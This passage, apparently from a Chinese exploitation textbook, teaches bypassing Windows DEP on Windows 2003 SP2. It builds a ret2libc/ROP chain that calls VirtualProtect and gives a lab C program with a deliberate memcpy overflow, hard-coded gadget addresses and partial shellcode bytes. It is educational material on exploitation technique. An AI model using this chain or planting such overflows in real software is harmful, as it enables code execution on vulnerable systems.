VirtualProtect函数

首先我们来看看MSDN上对VirtualProtect函数的说明。

 
 
BOOL VirtualProtect(  
  LPVOID lpAddress,  
  DWORD dwSize,  
  DWORD flNewProtect,  
  PDWORD lpflOldProtect  
);  

各参数的意义为：

lpAddress，要改变属性的内存起始地址。

dwSize，要改变属性的内存区域大小。

flNewProtect，内存新的属性类型，设置为PAGE_EXECUTE_READWRITE（0x40）时该内存页为可读可写可执行。

pflOldProtect，内存原始属性类型保存地址。

修改内存属性成功时函数返回非0，修改失败时返回0。

如果我们能够按照如下参数布置好栈帧的话就可以将shellcode所在内存区域设置为可执行模式。

 
 
BOOL VirtualProtect(  
   shellcode所在内存空间起始地址,  
   shellcode大小,  
   0x40,   
   某个可写地址  
;  

这里有两个问题需要注意。

（1）参数中包含0x00，strcpy在复制字符串的时候会被截断，所以我们不能攻击strcpy函数，本次实验中我们改为攻击memcpy函数。

（2）对shellcode所在内存空间起始地址的确定，不同机器之间shellcode在内存中的位置可能会有变化，本次实验中我们采用一种巧妙的栈帧构造方法动态确定shellcode所在内存空间起始地址。

我们将用如下代码演示如何布置栈帧，并利用VirtualProtect函数将shellcode所在内存区域设置为可执行状态，进而执行shellcode。

 
 
#include<stdlib.h> 
#include<string.h> 
#include<stdio.h> 
#include<windows.h> 
charshellcode[]=  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"……"  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"\x90\x90\x90\x90"  
"\x8A\x17\x84\x7C"  //pop eax retn  
"\x0A\x1A\xBF\x7C"  //pop pop pop retn  
"\xBA\xD9\xBB\x7C"  //修正EBP  
"\x8B\x17\x84\x7C"  //RETN  
"\x90\x90\x90\x90"  
"\xBF\x7D\xC9\x77"  //push esp jmp eax  
"\xFF\x00\x00\x00"  //修改内存大小  
"\x40\x00\x00\x00"  //可读可写可执行内存属性代码  
"\xBF\x7D\xC9\x77"  //push esp jmp eax  
"\x90\x90\x90\x90"  
"\x90\x90\x90\x90"  
"\xE8\x1F\x80\x7C"  //修改内存属性  
"\x90\x90\x90\x90"  
"\xA4\xDE\xA2\x7C"  //jmp esp  
"\x90\x90\x90\x90"  
"\x90\x90\x90\x90"  
"\x90\x90\x90\x90"  
"\x90\x90\x90\x90"  
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"  
"……"  
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"  
;  
voidtest()  
{  
      charstr[176];  
      memcpy(str,shellcode,420);  
}  
intmain()  
{  
      HINSTANCEhInst = LoadLibrary("shell32.dll");  
      chartemp[200];  
      test();  
return 0;  
}  

对实验思路和代码简要解释如下。

（1）为了更直观地反映绕过DEP的过程，我们在本次实验中不启用GS和SafeSEH。

（2）函数test存在一个典型的溢出，通过向str复制超长字符串造成str溢出，进而覆盖函数返回地址。

（3）覆盖掉函数返回地址后，通过Ret2Libc技术，利用VirtualProtect函数将shellcode所在内存区域设置为可执行模式。

（4）通过push esp jmp eax指令序列动态设置VirtualProtect函数中的shellcode所在内存起始地址以及内存原始属性类型保存地址。

（5）内存区域被设置成可执行模式后shellcode就可以正常执行了。

实验环境如表12-3-2所示。

表12-3-2  实验环境

	推荐使用的环境	备    注
操作系统	Windows 2003 SP2
DEP状态	Optout
编译器	VC++ 6.0
编译选项	禁用优化选项
build版本	release版本

首先我们来看看VirtualProtect函数的具体实现。如图12.3.17所示，VirtualProtect只是相当于做了一次中转，通过将进程句柄、内存地址、内存大小等参数传递给VirtualProtectEx函数来设置内存的属性。我们不妨选择0x7C801FE8作为切入点，按照函数要求将栈帧布置好后转入0x7C801FE8处执行设置内存属性过程。

图12.3.17  VirtualProtect函数具体实现过程

通过图12.3.17我们还可以看出从EBP+8到EBP+18这16个字节空间中存放着设置内存属性所需要的参数。[EBP+C]和[EBP+10]这两个参数是固定的，我们可以直接在shellcode中设置；但[EBP+8]和[EBP+14]这两个参数是需要动态确定的，要保证第一个参数可以落在我们可以控制的堆栈范围内，第二个参数要保证为一可写地址，我们布置shellcode的重点也就放在这两个参数上边。

由于EBP在溢出过程中被破坏，所以我们需要对EBP进行修复，首先我们用PUSH ESP POP EBP RETN 4指令的地址覆盖test函数的返回地址，shellcode如下所示。

 
 
char shellcode[]=  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  
"……"  
"\x90\x90\x90\x90"  
"\xBA\xD9\xBB\x7C"//修正EBP